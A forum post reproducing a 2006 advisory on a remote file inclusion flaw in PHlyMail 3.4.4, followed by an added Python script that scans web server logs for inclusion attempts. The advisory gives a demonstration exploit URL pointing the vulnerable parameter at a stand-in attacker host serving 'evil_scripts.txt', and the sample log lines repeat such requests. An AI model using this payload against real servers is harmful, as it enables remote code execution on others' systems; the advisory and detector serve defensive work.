[Question] PHlyMail Include File Bug in '_PM_['path']['handler']'
22/08/2006 23:56:31 (+0700) | #1

LeonHart (HVA Friend)
Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret

PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary
Version(s): 3.4.4 and prior versions
Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system.
The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]
Kacper (a.k.a Rahim) discovered this vulnerability.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
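As an added example that is not part of the original post or of PHlyMail, the following Python script scans web server access logs for requests that carry a remote URL in the '_PM_[path][handler]' parameter described above, so an administrator can spot inclusion attempts against 'mod.listmail.php'. The log lines and IP addresses are constructed sample data; the script handles both the raw and the percent-encoded spelling of the parameter name.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [22/Aug/2006:23:56:31 +0700] "GET /phlymail/handlers/email/mod.listmail.php?_PM_[path][handler]=http://198.51.100.9/evil_scripts.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Aug/2006:23:57:02 +0700] "GET /phlymail/handlers/email/mod.listmail.php?_PM_%5Bpath%5D%5Bhandler%5D=https%3A%2F%2F198.51.100.9%2Fx.txt HTTP/1.1" 200 512 "-" "curl/7.15"
192.0.2.10 - - [22/Aug/2006:23:58:10 +0700] "GET /phlymail/handlers/email/mod.listmail.php?folder=INBOX HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.11 - - [22/Aug/2006:23:59:00 +0700] "GET /phlymail/index.php?_PM_[path][handler]=/var/www/handlers HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# The parameter named in the advisory and the script it affects.
VULN_PARAM = "_PM_[path][handler]"
VULN_SCRIPT = "/handlers/email/mod.listmail.php"
# A value that starts with a URL scheme (http://, https://, ftp://, ...) means the
# include target is remote, which is the remote file inclusion case.
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def inspect_line(line):
    """Return a finding dict if the line carries a remote URL in _PM_[path][handler], else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes names and values, so both the raw "[path]" and
    # the "%5Bpath%5D" forms collapse to the same key.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get(VULN_PARAM, []):
        if REMOTE_RE.match(value):
            return {
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "script": parts.path,
                "include_target": value,
                # True when the request hits the script the advisory names.
                "advisory_script": parts.path.endswith(VULN_SCRIPT),
            }
    return None

def scan_log(text):
    """Run inspect_line over every line of an access log and collect the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} -> {f['include_target']}")
```

Only the two requests pointing the parameter at a remote URL are reported; a local path in the same parameter and ordinary folder listings are left alone.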